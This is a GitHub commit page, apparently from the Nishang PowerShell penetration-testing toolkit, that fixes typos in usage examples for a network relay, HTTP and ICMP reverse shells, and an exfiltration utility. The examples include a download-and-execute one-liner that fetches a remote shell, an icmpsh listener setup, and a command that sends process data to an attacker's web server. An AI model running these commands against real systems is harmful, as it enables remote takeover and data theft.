Skip to content

Commit 7995e2b

Browse files
committed
Minor bug and typo fixes.
1 parent 5ad48f3 commit 7995e2b

File tree

4 files changed

+12
-3
lines changed

4 files changed

+12
-3
lines changed

Pivot/Invoke-NetworkRelay.ps1

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -51,7 +51,7 @@ PS > Invoke-NetworkRelay -Relay v6tov4 -ListenAddress :: -Listenport 8888 -Conne
5151
Add a network relay which listens on IPv6 and connects to IPv4 and forwards port 445 from 192.168.1.22 to port 8888 of 192.168.254.141.
5252
5353
.EXAMPLE
54-
PS > Invoke-NetworkRelay -Relay v6tov4 -ListenAddress :: -Listenport 8888 -ConnectAddress fe80::19ed:c169:128c:b68d -ConnectPort 445 -ComputerName domainpc -Username bharat\domainuser -Password Password1234
54+
PS > Invoke-NetworkRelay -Relay v6tov6 -ListenAddress :: -Listenport 8888 -ConnectAddress fe80::19ed:c169:128c:b68d -ConnectPort 445 -ComputerName domainpc -Username bharat\domainuser -Password Password1234
5555
Add a network relay which listens on IPv6 and connects to IPv6 and forwards port 445 from fe80::19ed:c169:128c:b68d to port 8888 of domainpc
5656
5757
.EXAMPLE

Shells/Invoke-PoshRatHttp.ps1

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -23,7 +23,7 @@ The IP address on which the listener listens. Make sure that the IP address spec
2323
The port on which the connection is establised.
2424
2525
.EXAMPLE
26-
PS > Invoke-PoshRatHttps -IPAddress 192.168.254.1 -Port 80
26+
PS > Invoke-PoshRatHttp -IPAddress 192.168.254.1 -Port 80
2727
2828
Above shows an example where the listener starts on port 80. On the client execute:
2929
iex (New-Object Net.WebClient).DownloadString("http://192.168.254.1/connect")

Shells/Invoke-PowerShellIcmp.ps1

Lines changed: 8 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -19,6 +19,14 @@ Time in seconds for which the script waits for a command from the server. Defaul
1919
The size of output Buffer. Defualt is 128.
2020
2121
.EXAMPLE
22+
# sysctl -w net.ipv4.icmp_echo_ignore_all=1
23+
# python icmpsh_m.py 192.168.254.226 192.168.254.1
24+
25+
Run above commands to start a listener on a Linux computer (tested on Kali Linux).
26+
icmpsh_m.py is a part of the icmpsh tools.
27+
28+
On the target, run the below command.
29+
2230
PS > Invoke-PowerShellIcmp-IPAddress 192.168.254.226
2331
2432
Above shows an example of an interactive PowerShell reverse connect shell.

Utility/Do-Exfiltration.ps1

Lines changed: 2 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -45,7 +45,7 @@ PS > Get-Information | Do-Exfiltration -ExfilOption gmail -username <> -Password
4545
Use above command for data exfiltration to gmail
4646
4747
.EXAMPLE
48-
PS > Get-Information | Do-Exfiltration -ExfilOption Webserver -URL http://192.168.254.183/catchpost.php
48+
PS > Do-Exfiltration -Data (Get-Process) -ExfilOption Webserver -URL http://192.168.254.183/catchpost.php
4949
5050
Use above command for data exfiltration to a webserver which logs POST requests.
5151
@@ -96,6 +96,7 @@ https://github.com/samratashok/nishang
9696
$AuthNS
9797
)
9898

99+
99100
function post_http($url,$parameters)
100101
{
101102
$http_request = New-Object -ComObject Msxml2.XMLHTTP

0 commit comments

Comments
 (0)